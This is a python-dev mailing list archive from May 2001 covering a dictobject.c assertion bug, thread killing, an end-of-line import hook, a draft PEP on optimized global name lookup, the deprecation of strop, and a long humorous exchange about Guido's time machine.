http://avantgo.com/mydevice/autoadd.html?title=Daily%20Python%20URL&url=http%3A%2F%2Fwww.pythonware.com%2Fdaily%2Findex.htm&max=100&depth=1&images=0&links=1&refresh=always&hours=1&dflags=0&hour=0&quarter=00&s=00

PS: Would be nice if Fredrik could provide a "printable" version
of the Daily URL page, since the table layout doesn't work too
well on the small Palm display.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller at ion-tof.com  Wed May 23 20:57:28 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Wed, 23 May 2001 20:57:28 +0200
Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods))
References: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>              <020301c0e3ad$bb559790$e000a8c0@thomasnotebook>  <200105231802.f4NI26408784@odiug.digicool.com>
Message-ID: <033901c0e3ba$36aaa870$e000a8c0@thomasnotebook>

Let me try again (and please forgive my
mistakes in the detail).
The usual way (as in demo\metaclasses):

class B_Meta:
    ....

B = B_Meta('B', (), {})

class C(B):
    pass

B is an instance of the (meta)class B_Meta.
C is now another instance of the same (meta)class.
because B.__class__, which is the (meta)class itself,
is called, and returns a new instance.
B_Meta can (and must) implement a lot of behaviour.

In contrast, with my recipe:

def MagicFunction(name, bases, dict):
    ...construct a class on the fly...
    ...create an instance of this class...
    return aninstance_of_a_class

def B_Meta(): pass
B_Meta.__class__ = MagicFunction

class C(B):
    pass

Now C is an_instance_of_a_class (which is an instance
of a normal python class), and thus does inherit the
normal behaviour of Python classes.

Thomas

PS: I'm sure this all will be much better in descr-branch.
I've checked it out and am playing with it from time
to time, but most of the time I have to use released
Python versions.


From tim.one at home.com  Wed May 23 21:32:59 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:32:59 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523160025.B690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>

[Thomas Wouters]
>
> As those of you on python-checkins might have noticed ;) I started
> checking in Python 2.1.1 bufixes.

And bless you for it, Thomas!

> I'd hoped to finish all of my backlog today, but unfortuantely I'm
> now called away on a suprise emergency meeting,

Now that sucks.  Tell your manager that you'll only attend planned emergency
meetings from now on:  Guido plans Python crises years in advance, and it
shows in the relative cleanliness of the Python codebase <wink>.


From nas at python.ca  Wed May 23 21:41:14 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 23 May 2001 12:41:14 -0700
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>; from tim.one@home.com on Wed, May 23, 2001 at 03:32:59PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
Message-ID: <20010523124114.A4747@glacier.fnational.com>

Tim Peters wrote:
> Guido plans Python crises years in advance, and it shows in the
> relative cleanliness of the Python codebase <wink>.

I don't think Thomas has a time machine.

  Neil


From tim.one at home.com  Wed May 23 21:45:06 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 15:45:06 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010523140845.B092299C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com>

[Aahz]
> Okay, so we all know it isn't possible to kill threads cleanly and
> safely in any kind of cross-platform way.  At the same time, a program
> that has a thread running haywire should be able to kill itself
> completely, so that a monitoring process can restart it.  How hard would
> it be to do only that in a cross-platform way?

Since Python is written in C, and C says nothing about this, you need a
platform expert for each platform covered by "cross" <wink>.

> I'm guessing that for Unix, we'd just send a hard signal (9 or 15).  No
> clue what would need to happen for Windows and Mac.
>
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

Please open a bug report on that, then, with a tiny test case if possible.
This worked fine on Win98SE for me just now:

import thread, os, time

def task():
    while 1:
        print "x",
        time.sleep(.1)

for i in range(10):
    thread.start_new_thread(task, ())

time.sleep(5)
os._exit(1)

Windows kills all threads spawned by a process when "the main thread" exits.
You don't need to do os._exit(), and sys.exit() is normally a much better
idea (else, e.g., stdio buffers may not get flushed to disk).


From thomas at xs4all.net  Wed May 23 22:27:51 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 23 May 2001 22:27:51 +0200
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <20010523124114.A4747@glacier.fnational.com>; from nas@python.ca on Wed, May 23, 2001 at 12:41:14PM -0700
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com>
Message-ID: <20010523222751.G690@xs4all.nl>

On Wed, May 23, 2001 at 12:41:14PM -0700, Neil Schemenauer wrote:
> Tim Peters wrote:
> > Guido plans Python crises years in advance, and it shows in the
> > relative cleanliness of the Python codebase <wink>.
> 
> I don't think Thomas has a time machine.

*Don't* get me started on that. If only Guido would stop hogging the damned
thing, I could be a 34-year-old millionaire in a 10-room house and 8
girlfriends !

Now-I'm-short-ten-years-nine-million-eight-rooms-and-seven-girlfriends-ly
y'rs,
-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May 23 22:32:04 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 16:32:04 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <20010523111510.D504D3B8999@snelboot.oratrix.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

You wouldn't happen to have a reproducible test case?  That hash==8 is almost
certainly a red herring -- or a sign of wild stores <wink>.

> Going back to revision 2.90 fixes the problem (or masks it).

Instead of:

	assert(mp->ma_fill < mp->ma_size);

this code used to be:

	if (mp->ma_fill >= mp->ma_size) {
		/* No room for a new key.
		 * This only happens when the dict is empty.
		 * Let dictresize() create a minimal dict.
		 */
		assert(mp->ma_used == 0);
		if (dictresize(mp, 0) != 0)
			return -1;
		assert(mp->ma_fill < mp->ma_size);
	}

so the dict would get resized whenever ma_fill >= ma_size, although the code
only *expected* that to happen when the dict table was NULL.  It was perhaps
happening in other cases too.  The dict is never empty (NULL) after the
patch, so the special case for "empty" got replaced by an assert.

Offhand I don't see how this could be triggering -- although *something*
about the 2.90 logic makes me uneasy!  Ah, mp->ma_fill >= mp->ma_size wasn't
a correct test:  filled slots that aren't used slots don't stop a new key
from being added.  Assuming that's it, 2.90 could do needless calls to
dictresize, but the new version does a bogus assert instead.  So replace the
current version's offending

	assert(mp->ma_fill < mp->ma_size);

with

	assert(mp->ma_used < mp->ma_size);

Let me know whether that solves it.

2.90 may also suffer a bogus

		assert(mp->ma_used == 0);

failure.  It's not easy to provoke any of this, though (requires exactly the
right sequence of mixed inserts and deletes, with hash codes hitting exactly
the right dict slots).


From barry at digicool.com  Wed May 23 22:52:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 16:52:22 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
Message-ID: <15116.8966.324136.897953@anthem.wooz.org>

>>>>> "TW" == Thomas Wouters <thomas at xs4all.net> writes:

    TW> *Don't* get me started on that. If only Guido would stop
    TW> hogging the damned thing, I could be a 34-year-old millionaire
    TW> in a 10-room house and 8 girlfriends !

It's really not as easy as all that, though.  When Guido's not around,
I've been known to, er, take The Machine for a spin (sshh!  Do /not/
tell him!).  The first time I did, I didn't realize that the blue
toggle had to be in the down position, and when I stepped out,
everybody was speaking Esperanto, had half their heads shaved, and
were toting around what looked like a cross between a dog and a beach
ball (it drooled incessantly).

Fortunately, The Machine has a reset button (oddly labeled "History
Erase Button" and guarded by a candy-crazed TV announcer-like
automaton who must be coaxed from the button with a marshmallow
s'more).

The second time I used it, I'd forgotten that you must keep your left
hand on the silver sphere while you line up the parallel lines with
the lip-actuated alpha wheel.  Silly me, I'd removed my left hand just
before alignment in order to twist the fluroscopic reflection tube a
quarter rotation out of phase (rule of thumb: never listen to that
automaton when he's licked the last of the chocolate-y goo from his
fingers.  He'll say anything to get another s'more.)

You really don't want to know what that particular world looked like,
but let's just say it involved lots and lots of angry elephants.

So now I leave well enough alone, and I've learned that if you really
want to change the past, just wait for Guido to use it for his own
nefarious purposes, and tape a sign to his back requesting the (very
modest) change to the continuum that you're looking for.

And don't forget to smear the front of that sign with s'more.

-Barry


From tim.one at home.com  Wed May 23 23:02:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 17:02:17 -0400
Subject: [Python-Dev] Assertion failed in dictobject.c
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEBOKEAA.tim.one@home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGECAKEAA.tim.one@home.com>

[Jack Jansen]
> I'm seeing the assert on line 525 in dictobject.c (revision 2.92)
> failing. The debugger tells me that ma_fill and ma_size are both 8.
> ma_used is 2, and interestingly hash is also 8.

[Tim]
> You wouldn't happen to have a reproducible test case?

Nevermind; I do:

d = {}
for i in range(5):
    d[i] = i
for i in range(5):
    del d[i]
for i in range(5, 9):  # assert triggers when i == 8
    d[i] = i

The cure is more complicated than I described, though.


From esr at thyrsus.com  Thu May 24 00:39:49 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 18:39:49 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523183949.A19251@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> You really don't want to know what that particular world looked like,
> but let's just say it involved lots and lots of angry elephants.

You've been *there*?  Dang...that's the timeline that scared me into
hanging up my lab coat.  It was a slow Saturday and I was hatching
Sinister Plan For World Domination number 4.

What happened to the other three?  Well...I had been planning to
terrorize the western U.S with a giant mechanical spider, until some
guys from Hollywood offered me way too much money for it.  The trained
army of radioactive gorillas I spent the movie money on didn't work
out -- my Igor flatly refused to shovel any more radioactive gorilla
poop, and you know how hard it is to get good help these days.
Blackmailing major cities with a Zeppelin-mounted death ray projector
sounded cool but Radio Shack was out of the parts.

OK, so plan #4 was to create voracious mega-amoebas using my Ionic
Mutatron and send them out to destroy all my enemies, especially that
kid who beat me up in third grade.  There I was, cackling insanely,
just about to unleash these slimy horrors on an unsuspecting world to
wreak havoc and destruction, when the eka-rhodium electrodes on the
Mutatron arced over.  This produced a wild spike of temporokinetic
energy, and guess where *I* was standing?  Silly me.

Before you could say "plot complication" I was materializing in the
Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself,
as it turned out, who was getting wound up to try out his newest
human-goad on a mahout they had just captured from the Fortified
Cities.  The mahout was terrified out of his wits, and you would have
been too if you'd seen what the High Pachyderm's tusks were covered
with and the lascivious way his trunk was curled around that cheese
grater.  Euggghhh...

It was crazy.  The High Pachyderm was trumpeting like mad, tuskers
charging at me from all directions, and me with at least 5.23 seconds
to go until the temporokinetic charge wore off.  Fortunately I
remembered that elephants communicate using modulated infrasonics that
they hear with the flat part of their foreheads, and I had my trusty
sonic screwdriver on me.  I set it to "infra" at maximum volume and
hurled it at the High Pachyderm -- hit the bugger right in the tiara.
He went berserk and his confused guards started crashing into each
other left and right, which was a pretty impressive sight since the
smallest of them weighed over two and a half tons.
 
It was touch and go there, let me tell you.  I caught one glimpse of
the mahout's rapidly-retreating heels just as the charge wore off and
I was slingshotted back to my lab.  My sonic screwdriver, of course,
followed within seconds -- horribly crushed and mangled.

And that's when I swore off building fiendish devices.  Electrocution
I can laugh at, having my monstrous creations turn on me is all in a
day's work, and that one time I was accidentally transformed into a
fly I found some truly remarkable uses for a three-foot-long
prehensile tongue.  But what the High Pachyderm had planned was too
twisted even for *me*.

I decided Sinister Plan #5 would have to be a bit less hardware-intensive,
if only as a rest for my frazzled nerves.  So I spent the last juice in
the batteries on the orbital mind-control lasers (long story) to implant
some subtle suggestions in a few minds at Netscape and IBM and elsewhere,
and started hitting the conference circuit pretty heavy.

What suggestions?  Oh, nothing important.  Nothing at all...BWAHAHAHAHA!!!
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes the law defends plunder and participates in it. Sometimes
the law places the whole apparatus of judges, police, prisons and
gendarmes at the service of the plunderers, and treats the victim --
when he defends himself -- as a criminal.
	-- Frederic Bastiat, "The Law"


From gward at python.net  Thu May 24 01:48:10 2001
From: gward at python.net (Greg Ward)
Date: Wed, 23 May 2001 19:48:10 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org>
Message-ID: <20010523194810.A9947@gerg.ca>

On 23 May 2001, Barry A. Warsaw said:
> The second time I used it, I'd forgotten that you must keep your left
> hand on the silver sphere while you line up the parallel lines with
> the lip-actuated alpha wheel.

What?  You mean Guido's time machine was really designed by Larry Wall?
Oh, the irony...

        Greg
-- 
Greg Ward - Python bigot                                gward at python.net
http://starship.python.net/~gward/
If you can read this, thank a programmer.


From dgoodger at bigfoot.com  Thu May 24 03:04:46 2001
From: dgoodger at bigfoot.com (David Goodger)
Date: Wed, 23 May 2001 21:04:46 -0400
Subject: [Python-Dev] Re: Import hook to do end-of-line conversion?
In-Reply-To: <3B0AF45D.732126E6@home.net>
Message-ID: <B731D420.11CB9%dgoodger@bigfoot.com>

Yesterday I found I had need for an end-of-line conversion import hook. I
looked sround but found none (did I miss some code on this thread?), so I
whipped one up (below). It seems to do the job. If you see any goofs, gaffes
or gotchas, or if you know of a better way to do this, please let me know. I
will post this code to c.l.py in a few days for the enjoyment of all.

-- 
David Goodger    dgoodger at bigfoot.com    Open-source projects:
 - The Go Tools Project: http://gotools.sourceforge.net
 - reStructuredText: http://structuredtext.sourceforge.net (soon!)

-----%<----------cut----------%<----------%<----------cut----------%<-----

# Import hook for end-of-line conversion,
# by David Goodger (dgoodger at bigfoot.com).

# Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
# import Python modules with any of Unix, Mac, or Windows line endings.

import ihooks, imp, py_compile

class MyHooks(ihooks.Hooks):

    def load_source(self, name, filename, file=None):
        """Compile source files with any line ending."""
        if file:
            file.close()
        py_compile.compile(filename)    # line ending conversion is in here
        cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
        try:
            return self.load_compiled(name, filename, cfile)
        finally:
            cfile.close()

class MyModuleLoader(ihooks.ModuleLoader):

    def load_module(self, name, stuff):
        """Special-case package directory imports."""
        file, filename, (suff, mode, type) = stuff
        path = None
        if type == imp.PKG_DIRECTORY:
            stuff = self.find_module_in_dir("__init__", filename, 0)
            file = stuff[0]             # package/__init__.py
            path = [filename]
        try:                            # let superclass handle the rest
            module = ihooks.ModuleLoader.load_module(self, name, stuff)
        finally:
            if file:
                file.close()
        if path:
            module.__path__ = path      # necessary for pkg.module imports
        return module

ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()


From jeremy at alum.mit.edu  Thu May 24 03:10:55 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Wed, 23 May 2001 21:10:55 -0400 (EDT)
Subject: [Python-Dev] pre-PEP on optimized global names
Message-ID: <200105240110.VAA09078@newman.concentric.net>

I've been hoping to work on optimized global and builtin name support
for Python 2.2.  I'm not sure if I'll have time, but thought I'd
circulate a draft with some notes on the subject now.  Anyone
interested in this work?

Jeremy

PEP: ???
Title: Optimized Access to Module and Builtin Names
Author: jeremy at digicool.com (Jeremy Hylton)
Status: Draft
Type: Standards Track
Python-Version: 2.2
Created: 23-May-2001

Abstract

    This PEP proposes a new implementation of global module namespaces
    and the builtin namespace that speeds name resolution.  The
    implementation would use an array of object pointers for most
    operations in these namespaces.  The compiler would assign indices
    for global variables at compile time.

    The current implementation represents these namespaces as
    dictionaries.  A global name incurs a dictionary lookup each time
    it is used; a builtin name incurs two dictionary lookups, a failed
    lookup in the global namespace and a second lookup in the builtin
    namespace. 

    This implementation should speed Python code that uses
    module-level functions and variables.  It should also eliminate
    awkward coding styles that have evolved to speed access to these
    names.

    The implementation is complicated because the global and builtin
    namespaces can be modified dynamically in ways that are impossible
    for the compiler to detect.  (Example: A module's namespace is
    modified by a script after the module is imported.)  As a result,
    the implementation must maintain several auxillary data structures
    to preserve these dynamic features.

Introduction

    [expand on the basic ideas in the abstract]

    [describe the key parts of the design: dlict, compiler support,
    stupid name trick workarounds, optimization of other module's
    globals] 

DLict design

    The namespaces are implemented using a data structure that has
    sometimes gone under the name dlict.  It is a dictionary that has
    numbered slots for some dictionary entries.  The type must be
    implemented in C to achieve acceptable performance.  A Python
    implementation is included here to explain the basic design:

"""A dictionary-list hybrid"""

import types

class DLict:
    def __init__(self, names):
        assert isinstance(names, types.DictType)
        self.names = {}
        self.list = [None] * size
        self.empty = [1] * size
        self.dict = {}
        self.size = 0

    def __getitem__(self, name):
        i = self.names.get(name)
        if i is None:
            return self.dict[name]
        if self.empty[i] is not None:
            raise KeyError, name
        return self.list[i]

    def __setitem__(self, name, val):
        i = self.names.get(name)
        if i is None:
            self.dict[name] = val
        else:
            self.empty[i] = None
            self.list[i] = val
            self.size += 1

    def __delitem__(self, name):
        i = self.names.get(name)
        if i is None:
            del self.dict[name]
        else:
            if self.empty[i] is not None:
                raise KeyError, name
            self.empty[i] = 1
            self.list[i] = None
            self.size -= 1

    def keys(self):
        if self.dict:
            return self.names.keys() + self.dict.keys()
        else:
            return self.names.keys()

    def values(self):
        if self.dict:
            return self.names.values() + self.dict.values()
        else:
            return self.names.values()

    def items(self):
        if self.dict:
            return self.names.items()
        else:
            return self.names.items() + self.dict.items()

    def __len__(self):
        return self.size + len(self.dict)

    def __cmp__(self, dlict):
        c = cmp(self.names, dlict.names)
        if c != 0:
            return c
        c = cmp(self.size, dlict.size)
        if c != 0:
            return c
        for i in range(len(self.names)):
            c = cmp(self.empty[i], dlict.empty[i])
            if c != 0:
                return c
            if self.empty[i] is None:
                c = cmp(self.list[i], dlict.empty[i])
                if c != 0:
                    return c
        return cmp(self.dict, dlict.dict)
    
    def clear(self):
        self.dict.clear()
        for i in range(len(self.names)):
            if self.empty[i] is None:
                self.empty[i] = 1
                self.list[i] = None

    def update(self):
        pass

    def load(self, index):
        """dlict-special method to support indexed access"""
        if self.empty[index] is None:
            return self.list[index]
        else:
            raise KeyError, index # XXX might want reverse mapping

    def store(self, index, val):
        """dlict-special method to support indexed access"""
        self.empty[index] = None
        self.list[index] = val

    def delete(self, index):
        """dlict-special method to support indexed access"""
        self.empty[index] = 1
        self.list[index] = None


Compiler issues

    The compiler currently collects the names of all global variables
    in a module.  These are names bound at the module level or bound
    in a class or function body that declares them to be global.

    The compiler would assign indices for each global name and add the
    names and indices of the globals to the module's code object.
    Each code object would then be bound irrevocably to the module it
    was defined in.  (Not sure if there are some subtle problems with
    this.)

Enhancement: Optimized access to other module's globals

    If one module imports another and binds a name in the global
    namespace, the compiler currently detects that the particular
    global is bound to a module.  The compiler also note access to any
    attribute of a module, and emit special opcodes for accessing
    these names.

    At runtime the implementation can lookup the index of the module
    attribute in the module's namespace.  In the current namespace,
    a pointer to the foreign module's dlict can be recorded along with
    the name's offset in the dlict.  This would allow names,
    e.g. types.StringType, to be used with the same efficiency as
    globals. 

Backwards compatibility

    The dlict will need to maintain metainformation about whether a
    slot is currently used or not.  It will also need to maintain a
    pointer to the builtin namespace.  When a name is not currently
    used in the global namespace, the lookup will have to fail over to
    the builtin namespace.

    In the reverse case, each module may need a special accessor
    function for the builtin namespace that checks to see if a global
    shadowing the builtin has been added dynamically.  This check
    would only occur if there was a dynamic change to the module's
    dlict, i.e. when a name is bound that wasn't discovered at
    compile-time. 

    These mechanisms would have little if any cost for the common case
    whether a module's global namespace is not modified in strange
    ways at runtime.  They would add overhead for modules that did
    unusual things with global names, but this is an uncommon practice
    and probably one worth discouraging.

    It may be desirable to disable dynamic additions to the global
    namespace in some future version of Python.  If so, the new
    implementation could provide warnings.
    

Local Variables:
mode: indented-text
indent-tabs-mode: nil
End:


From barry at digicool.com  Thu May 24 04:46:30 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 22:46:30 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
Message-ID: <15116.30214.900667.624573@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Before you could say "plot complication" I was materializing
    ESR> in the Hyraxeum -- damn near nose-to-trunk with the High
    ESR> Pachyderm himself, as it turned out, who was getting wound up
    ESR> to try out his newest human-goad on a mahout they had just
    ESR> captured from the Fortified Cities.

That big self-important elephant wasn't named Puffy the Frog by any
chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
of nerve calling himself the "High Pachyderm"!  Quite a lofty title
for one who's skin is stretched to just this side of its tensile
breaking point.

Sure, I know ol' Puffy, had a few binges with the old goat myself.
You just don't want to be near him when the stray micro-meteor happens
to pierce his dermis.  Much, MUCH messier than eight crates of cornbob
filled to the brim with radioactive gorilla poop, I can assure you!

now-where'd-i-leave-my-medication?-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:04:58 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:04:58 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org>
Message-ID: <20010523230458.A28895@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> That big self-important elephant wasn't named Puffy the Frog by any
> chance, was he?  Did he taste vaguely lemony?  If so, he's got a lot
> of nerve calling himself the "High Pachyderm"!  Quite a lofty title
> for one who's skin is stretched to just this side of its tensile
> breaking point.

Congratulations, Barry.  I googled for "Puffy the Frog" and found a
page that...explained...this.  It was the #1 hit.

Apparently the Universe is an even more random place than I thought. 
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If I were to select a jack-booted group of fascists who are 
perhaps as large a danger to American society as I could pick today,
I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms].
        -- U.S. Representative John Dingell, 1980


From barry at digicool.com  Thu May 24 05:14:07 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 23 May 2001 23:14:07 -0400
Subject: [Python-Dev] Python 2.1.1
References: <20010523160025.B690@xs4all.nl>
	<LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com>
	<20010523124114.A4747@glacier.fnational.com>
	<20010523222751.G690@xs4all.nl>
	<15116.8966.324136.897953@anthem.wooz.org>
	<20010523183949.A19251@thyrsus.com>
	<15116.30214.900667.624573@anthem.wooz.org>
	<20010523230458.A28895@thyrsus.com>
Message-ID: <15116.31871.122265.883855@anthem.wooz.org>

>>>>> "ESR" == Eric S Raymond <esr at thyrsus.com> writes:

    ESR> Congratulations, Barry.  I googled for "Puffy the Frog" and
    ESR> found a page that...explained...this.  It was the #1 hit.

Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
singer in the Atlanta-based band "The Shrinking of George".  What you
found is no doubt the lyrics to that song, which topped the pop charts
briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact),
displacing the Beatles "I Wanna Hold Your Head" before being itself
displaced by the The Bee Gee's "Booger Feever" [sic].  Sadly, even
Napster doesn't have the mp3's and all Dad's old records are scratched
beyond hope.

    ESR> Apparently the Universe is an even more random place than I
    ESR> thought.

here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,
-Barry


From esr at thyrsus.com  Thu May 24 05:31:42 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 23 May 2001 23:31:42 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400
References: <20010523160025.B690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEBHKEAA.tim.one@home.com> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <20010523233142.A29023@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> Yes!  In 1965.  My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass
> singer in the Atlanta-based band "The Shrinking of George". 

I suppose it's not a coincidence that it's Fernando Poo day today.
Of course it's not a coincidence.  There are no coincidences anywhere.
Fnord.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Sometimes it is said that man cannot be trusted with the government
of himself.  Can he, then, be trusted with the government of others?
	-- Thomas Jefferson, in his 1801 inaugural address


From aahz at rahul.net  Thu May 24 06:59:37 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 23 May 2001 21:59:37 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEBJKEAA.tim.one@home.com> from "Tim Peters" at May 23, 2001 03:45:06 PM
Message-ID: <20010524045938.5228199C83@waltz.rahul.net>

Tim Peters wrote:
> [Aahz]
>>
>> (This got brought up because I experimented with os._exit() as a
>> possible solution, but that GPFs on Win98SE.)
> 
> Please open a bug report on that, then, with a tiny test case if possible.
> This worked fine on Win98SE for me just now:

Futz.  *Now* it works.  <sigh>  Chalk it up to another unreproducible
bug caused by an unstable Win98.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From gstein at lyra.org  Thu May 24 10:33:49 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:33:49 -0700
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82
In-Reply-To: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700
References: <E14zUMI-0006ya-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010524013349.Y5402@lyra.org>

On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote:
> Update of /cvsroot/python/python/dist/src/Modules
> In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules
> 
> Modified Files:
> 	stropmodule.c 
> Log Message:
> Add warnings to the strop module, for to those functions that really
> *are* obsolete; three variables and the maketrans() function are not
> (yet) obsolete.
> 
> Add a compensating warnings.filterwarnings() call to test_strop.py.
> 
> Add this to the NEWS.

Something that I ran into the other day...

>>> ob = some_object_implementing_the_buffer_interface
>>> string.find(ob, '.')
(fails because ob does not define the .find method)
>>> strop.find(ob, '.')
(succeeds)


The point is that strop uses the t# to get a ptr/len pair to do its work.
Thus, it can work on many things that export the buffer interface. Dropping
strop means we no longer have many of those functions. Instead, the
functionality must be copied to *every* object that implements the buffer
interface.

We can say ob.find() now, but we can't say find(ob) any longer. And saying
that all objects (which implement the buffer API) must now implement a bunch
of "standard" methods is awfully burdensome.

In my particular case, I was trying to do a find on a BufferObject referring
to a subset of another object. Blam. No good. Thankfully, when I did a
find() on a mmap object, it worked simply because mmaps happen to define a
.find method.

[ of course, the find method on an mmap was totally broken, but I checked in
  a fix for that (last week or so) ]


So... my question is: is there any way that we can retain a generic find()
(and similar functions from the string/strop module) that operates on any
type that implements the buffer API?

Maybe there is some way we can do a mixin for Python types? e.g. "this mixin
implements some standard methods for 8-bit character data (using the buffer
API), which can be mixed into new Python types" That would reduce the burden
for new types.

Thoughts?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From gstein at lyra.org  Thu May 24 10:52:58 2001
From: gstein at lyra.org (Greg Stein)
Date: Thu, 24 May 2001 01:52:58 -0700
Subject: [Python-Dev] IPv6
